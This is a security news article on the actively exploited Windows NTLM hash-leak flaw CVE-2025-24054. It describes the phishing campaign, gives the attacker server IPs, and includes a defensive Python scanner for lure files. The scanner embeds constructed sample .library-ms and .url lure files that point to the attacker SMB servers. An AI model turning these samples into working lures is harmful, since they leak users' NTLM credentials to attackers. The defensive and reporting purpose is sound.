Windows vulnerability with NTLM hash abuse exploited for phishing

A recently identified Windows vulnerability, tracked as CVE-2025-24054, is being actively exploited in targeted phishing campaigns against government bodies and private enterprises. Initially assessed as a low-risk issue, it was fixed in Microsoft's March 2025 Patch Tuesday updates. According to BleepingComputer, however, researchers at Check Point observed a marked increase in exploitation attempts only days after the patches were released.

Between March 20 and 25, 2025, Check Point observed a surge in attacks tied to an IP address previously linked to the Russian state-sponsored group APT28, also known as 'Fancy Bear'. The researchers caution that a shared IP address on its own is not conclusive evidence and does not attribute the campaign to that group.

NTLM (New Technology LAN Manager) is a Microsoft authentication protocol based on a challenge-response exchange: the client proves knowledge of the password hash by answering a server challenge, so the password itself is never sent. Despite that design, NTLM is exposed to well-known attacks, in particular relay attacks, in which a captured authentication is forwarded to another service, and offline cracking of the captured challenge-response (the so-called Net-NTLMv2 hash). Microsoft is therefore gradually phasing NTLM out in favour of Kerberos.

In the phishing campaigns uncovered by Check Point, the attackers targeted organisations in Poland and Romania with emails containing links to Dropbox-hosted ZIP archives. The archives contained .library-ms files, a legitimate XML-based file type that defines a Windows library, a virtual folder aggregating files and folders from several locations.

In this attack the .library-ms file was configured with a location pointing to an external SMB server under the attackers' control. As soon as the archive was extracted, Windows Explorer parsed the library definition and connected to that SMB server, triggering CVE-2025-24054. The victim's machine then attempted to authenticate, and the attackers captured the NTLMv2 challenge-response (the Net-NTLMv2 hash) sent during that attempt.

In a later wave, Check Point found phishing emails that carried the .library-ms file as a direct attachment, with no ZIP archive at all. Simply downloading the .library-ms file was enough to trigger NTLM authentication to the external server, which shows how little effort exploitation requires.

Minimal user interaction is sufficient

On March 25, 2025, Check Point reported a global campaign in which the malicious files were distributed without any archive. Microsoft states that the vulnerability can be triggered by minimal interaction with a malicious file, such as selecting it with a single click or inspecting it via the right-click context menu, without the file ever being opened or executed.

The malicious ZIP archive also contained three further files, 'xd.url', 'xd.website' and 'xd.link', which rely on older, well-known NTLM hash-leak techniques such as shortcut files whose icon path points to a remote share. These appear to serve as fallbacks should the primary .library-ms method fail.
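As an added illustration, not code from the article or from Check Point, the following Python script scans the lure file types named above (.library-ms, .url, .website and .link) for UNC or file:// references to non-private hosts, which is precisely what causes the outbound NTLM authentication. It is the kind of triage check a mail gateway or sandbox could run on attachments and extracted archive contents. The sample file contents are constructed here from the article's description (the two IP addresses are the attacker servers the article names); the .library-ms XML namespace and the INTERNAL_SUFFIXES allow-list are assumptions.

```python
"""Flag lure files that reference external SMB/WebDAV hosts (NTLM leak triage).

Added example: constructed samples, not files recovered from the campaign.
"""
import ipaddress
import re
import xml.etree.ElementTree as ET
from dataclasses import dataclass

# Domain suffixes treated as internal (assumption; adjust to your environment).
INTERNAL_SUFFIXES = (".corp.example",)

# \\host\share and file://host/... references; host may carry WebDAV @SSL@443 syntax.
UNC_RE = re.compile(r"""\\\\([^\\\s/"'<>]+)""")
FILE_URL_RE = re.compile(r"""file://([^/\\\s"'<>]+)""", re.IGNORECASE)

# Constructed sample files modelled on the lure described in the article.
SAMPLES = {
    # Malicious library: location is an attacker SMB server (namespace assumed).
    "xd.library-ms": r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <isLibraryPinned>true</isLibraryPinned>
  <iconReference>imageres.dll,-1002</iconReference>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <isDefaultSaveLocation>true</isDefaultSaveLocation>
      <simpleLocation>
        <url>\\159.196.128.120\share</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
""",
    # Fallback lure: icon and target on remote hosts (classic .url hash leak).
    "xd.url": r"""[InternetShortcut]
URL=file://159.196.128.120/share/xd.html
IconFile=\\194.127.179.157\share\xd.ico
IconIndex=1
""",
    # Benign library pointing at a known folder (the Documents folder GUID).
    "Documents.library-ms": r"""<?xml version="1.0" encoding="UTF-8"?>
<libraryDescription xmlns="http://schemas.microsoft.com/windows/2009/library">
  <name>@shell32.dll,-34575</name>
  <version>6</version>
  <searchConnectorDescriptionList>
    <searchConnectorDescription>
      <simpleLocation>
        <url>knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}</url>
      </simpleLocation>
    </searchConnectorDescription>
  </searchConnectorDescriptionList>
</libraryDescription>
""",
}


@dataclass(frozen=True)
class Finding:
    filename: str
    host: str
    reference: str


def extract_hosts(text: str) -> list[str]:
    """Return every host referenced by a UNC path or file:// URL in text."""
    return UNC_RE.findall(text) + FILE_URL_RE.findall(text)


def is_external(host: str) -> bool:
    """True if authenticating to host would leave the private network."""
    host = host.split("@")[0].strip("[]")  # drop WebDAV @SSL@port suffix, IPv6 brackets
    try:
        return ipaddress.ip_address(host).is_global
    except ValueError:
        # Single-label names resolve via the local domain/NetBIOS; an FQDN
        # outside the internal suffixes may resolve to anything.
        return "." in host and not host.lower().endswith(INTERNAL_SUFFIXES)


def library_ms_locations(xml_text: str) -> list[str]:
    """Extract <url> location values from a .library-ms file (namespace-agnostic)."""
    root = ET.fromstring(xml_text.encode("utf-8"))
    return [el.text.strip() for el in root.iter()
            if el.tag.rsplit("}", 1)[-1] == "url" and el.text]


def scan_file(filename: str, content: str) -> list[Finding]:
    """Return findings for references to external hosts in one lure file."""
    name = filename.lower()
    if name.endswith(".library-ms"):
        candidates = library_ms_locations(content)
    elif name.endswith((".url", ".website", ".link")):
        candidates = content.splitlines()  # INI-style text; scan line by line
    else:
        return []  # binary .lnk shortcuts need a dedicated parser, not handled here
    return [Finding(filename, host.split("@")[0], ref.strip())
            for ref in candidates for host in extract_hosts(ref) if is_external(host)]


def scan_samples() -> list[Finding]:
    """Run the scanner over the constructed samples."""
    return [f for name, body in SAMPLES.items() for f in scan_file(name, body)]


if __name__ == "__main__":
    for finding in scan_samples():
        print(f"{finding.filename}: external host {finding.host} via {finding.reference!r}")
```

The scan works on file contents alone and never touches the network, so it is safe to run on quarantined attachments. Hosts inside RFC 1918 ranges and single-label NetBIOS names are deliberately ignored, because libraries and shortcuts pointing at internal file servers are legitimate; the allow-list is the one knob to tune.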

Check Point identified the attackers' SMB servers at the IP addresses 159.196.128[.]120 and 194.127.179[.]157. A captured Net-NTLMv2 response can be relayed to other services that still accept NTLM or cracked offline to recover the user's password, giving the attacker that user's access across the network. Although CVE-2025-24054 is rated medium severity, the potential impact is therefore significant.

Given the minimal interaction required for exploitation, organisations are advised to treat this vulnerability as high risk. They should apply the March 2025 updates, block outbound SMB (TCP 445) to the internet at the perimeter, and restrict or disable NTLM authentication wherever it is not essential to their operations.
